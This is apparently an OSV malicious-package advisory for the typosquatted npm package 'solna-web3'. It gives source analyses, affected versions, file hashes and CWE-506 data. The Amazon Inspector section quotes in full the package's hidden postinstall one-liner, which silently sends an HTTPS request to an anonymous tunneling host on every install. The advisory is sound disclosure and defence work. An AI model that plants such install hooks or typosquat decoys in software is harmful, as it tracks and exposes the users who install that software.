MAL-2026-4248

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/solna-web3/MAL-2026-4248.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4248
Aliases
  • GHSA-39j5-93x5-73hc
Published
2026-05-20T00:21:01Z
Modified
2026-05-26T06:02:55.864039918Z
Summary
Malicious code in solna-web3 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6076f4236301f997d420c7daba9b12c035fe2866fa9fa42f59be230b5e90350a)

Package name 'solna-web3' is a one-character typosquat of the popular '@solana/web3.js' (drops the 'a' from 'solana'). The package's only real functionality lives in a postinstall hook: package.json declares "postinstall": "node -e '(async()=>{try{await require(\"https\").get(\"rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry\")}catch(e){}})()'", which performs an HTTPS GET to a pinggy-free.link tunneling subdomain on every npm install. Pinggy is an anonymous, ephemeral tunneling service unrelated to npm or Solana; the path /npm/-/binary/telemetry is cover-story styling that mimics npm registry paths. Errors are silently swallowed. The request leaks installer IP, timing, and install count to attacker-controlled infrastructure with no opt-in. The advertised API surface (index.js exports a single trivial getProgram() that logs and shells out solana --version) is a stub designed to make the package look real; real behavior is the beacon. Combination of typosquat against a top-100 package + postinstall exfiltration to an anonymous tunneling host + decoy API is unambiguous supply-chain attack shape.

Source: ghsa-malware (f1c647bdc92e25b1b7c0ce1b45520d1c8fdc3ebe47dab9292832c6457204cf5f)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-22T03:24:54.621402895Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "f1c647bdc92e25b1b7c0ce1b45520d1c8fdc3ebe47dab9292832c6457204cf5f",
            "id": "GHSA-39j5-93x5-73hc",
            "source": "ghsa-malware",
            "modified_time": "2026-05-22T02:43:00Z"
        },
        {
            "import_time": "2026-05-26T05:50:24.356599752Z",
            "versions": [
                "1.5.98"
            ],
            "sha256": "6076f4236301f997d420c7daba9b12c035fe2866fa9fa42f59be230b5e90350a",
            "id": "IN-MAL-2026-003313",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T00:21:01Z"
        }
    ]
}
References
Credits

Affected packages

npm / solna-web3

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected

Affected versions

1.*
1.5.98

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "c3b1eba4b485bca512c89b0fe8997275fe5fe89d0ca3d6269b11dc8516a93248",
            "tlsh": "a6f00c74d7b85c6318c89a6a086d60c5e8224c0b5940b90c338b810dc76e77b50fe628",
            "path": "package.json"
        },
        {
            "sha256": "687411faa87786d771987597341bdcf738d5d71984d0ffb698db9c6e741be60e",
            "tlsh": "77c02b7007d489f2301000067c01d4923ad38d36b100e108082c5c8b0784788213e47d",
            "path": "index.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-I5GNOicf/KYu3vFOa4KRRUqajL/hE+FqbhzemV5WP8+40y37Ts90YcTekIlCV/igzpSMPRPt5W7uORTPbEXDsw==",
                "sha1": "cfc22092234a447d460fdeb71932b7be14f39b54"
            },
            "filename": "solna-web3-1.5.98.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/solna-web3/MAL-2026-4248.json"